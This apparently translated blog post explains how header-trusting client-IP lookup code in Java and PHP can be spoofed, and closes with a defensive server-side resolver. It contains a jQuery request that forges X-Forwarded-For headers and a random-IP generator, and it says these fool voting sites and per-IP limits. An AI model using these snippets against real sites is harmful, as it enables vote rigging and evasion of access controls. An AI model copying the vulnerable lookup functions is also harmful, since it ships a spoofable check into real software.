In Java and PHP applications, the following method is frequently used to obtain the browser's IP address in the belief that it yields the "correct" IP. The code looks like this:
```java
import javax.servlet.http.HttpServletRequest;

// Returns the address the server will treat as the client's IP.
// Every header consulted here is supplied by the client and is used without any
// check that a trusted proxy set it; only getRemoteAddr() comes from the TCP socket.
public static String getClientIp(HttpServletRequest request) {
    String ip = request.getHeader("x-forwarded-for");
    if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) {
        ip = request.getHeader("Proxy-Client-IP");
    }
    if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) {
        ip = request.getHeader("WL-Proxy-Client-IP");
    }
    if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) {
        ip = request.getRemoteAddr();
    }
    return ip;
}
```
It is precisely this so-called safety measure that makes the IP address trivial to substitute: forging any of the headers "x-forwarded-for", "Proxy-Client-IP" or "WL-Proxy-Client-IP" makes the server believe the client's address is the forged one, which bypasses controls such as server-side IP range restrictions and "one request per IP" limits.
Forging the IP address with $.ajax looks like this:
```javascript
// ip and data are assumed to be defined earlier in the page's script
$.ajax('/login', {
    headers : {
        'x-forwarded-for': ip,
        // 'Proxy-Client-IP': ip,
        'WL-Proxy-Client-IP': ip
    },
    method:'POST',
    contentType:'application/json;charset=utf-8',
    // submitted as a JSON payload
    data : JSON.stringify(data),
    success : function(datas) {
        // print the result
        console.log(datas)
    }
})
```
In testing, the method above fools many IP checks found on the web, such as vote-canvassing sites. A way to generate a random IP is shown below (it is far too crude; improving it is recommended):
```javascript
// The IP this produces may fall inside a private (intranet) range
function createIp() {
    var a = Math.round(Math.random() * 250) + 1,
        b = Math.round(Math.random() * 250) + 1,
        c = Math.round(Math.random() * 240) + 1,
        d = Math.round(Math.random() * 240) + 1;
    return [a, b, c, d].join('.');
}
```
Getting the client IP in PHP is something everyone knows how to do; the usual code is:
```php
<?php
/**
 * Get the client IP.
 * @param number $type 0 returns the dotted string, 1 returns the unsigned long form
 * @return string
 */
function getClientIp($type = 0) {
    $type = $type ? 1 : 0;
    static $ip = NULL;
    if ($ip !== NULL) return $ip[$type];
    // HTTP_X_FORWARDED_FOR and HTTP_CLIENT_IP are request headers the client can set freely;
    // only REMOTE_ADDR comes from the TCP connection.
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $pos = array_search('unknown', $arr);
        if (false !== $pos) unset($arr[$pos]);
        $arr = array_values($arr); // reindex so $arr[0] exists after an unset
        $ip = trim($arr[0]);
    } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (isset($_SERVER['REMOTE_ADDR'])) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    // Validate the IP address: ip2long() returns false for anything that is not a dotted quad
    $long = sprintf("%u", ip2long($ip));
    $ip = $long ? array($ip, $long) : array('0.0.0.0', 0);
    return $ip[$type];
}
```
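Both the Java and the PHP lookups above take the first forwarding header they find at face value. As an added example that is not part of the original post, the JavaScript below shows how the resolution should be done on the server side: forwarding headers are consulted only when the TCP peer is one of our own reverse proxies, the X-Forwarded-For chain is walked from the right past trusted hops, and the chosen value is validated. The `{ remoteAddr, headers }` request shape and the `TRUSTED_PROXIES` list are assumptions.

```javascript
// Added example, not code from the original post: a client-IP resolver that
// consults X-Forwarded-For only when the TCP peer is one of our own reverse
// proxies, and ignores Proxy-Client-IP / WL-Proxy-Client-IP entirely.
// Request shape { remoteAddr, headers } and the proxy list are assumptions.

const TRUSTED_PROXIES = new Set(['10.0.0.5', '127.0.0.1']); // assumed: our own proxies

// Strict dotted-quad check: four decimal octets 0-255, no leading zeros,
// so values like "unknown" or "01.2.3.4" are rejected rather than trusted.
function isValidIPv4(s) {
  const parts = String(s).split('.');
  return parts.length === 4 &&
    parts.every(p => /^(0|[1-9]\d{0,2})$/.test(p) && Number(p) <= 255);
}

// Returns the address the application should act on (rate limits, IP allowlists).
// 1. If the peer is not a trusted proxy, the request reached us directly and every
//    forwarding header is client-controlled: use the socket address only.
// 2. Otherwise walk X-Forwarded-For from the right. Proxies append the address
//    they saw, so the rightmost non-proxy entry is the real client; anything to
//    its left (including a spoofed value the client sent) is never considered.
function resolveClientIp(req, trustedProxies = TRUSTED_PROXIES) {
  const peer = req.remoteAddr;
  if (!trustedProxies.has(peer)) return peer;
  const xff = req.headers['x-forwarded-for'] || '';
  const hops = xff.split(',').map(h => h.trim()).filter(Boolean);
  for (let i = hops.length - 1; i >= 0; i--) {
    if (trustedProxies.has(hops[i])) continue;
    // Malformed value from the proxy chain: fall back to the peer rather than use it.
    return isValidIPv4(hops[i]) ? hops[i] : peer;
  }
  return peer; // header absent or containing only our own proxies
}

// Constructed sample requests: a direct spoof attempt, and a proxied request
// carrying a client-supplied fake entry in front of the real address.
const SAMPLE_REQUESTS = {
  directSpoof: { remoteAddr: '203.0.113.7', headers: { 'x-forwarded-for': '1.2.3.4' } },
  viaProxy:    { remoteAddr: '10.0.0.5',    headers: { 'x-forwarded-for': '1.2.3.4, 203.0.113.7' } },
};

function resolveSamples() {
  const out = {};
  for (const [name, req] of Object.entries(SAMPLE_REQUESTS)) out[name] = resolveClientIp(req);
  return out;
}
```

In both sample cases the resolver yields 203.0.113.7, the address the network actually saw, and the injected 1.2.3.4 never reaches the application.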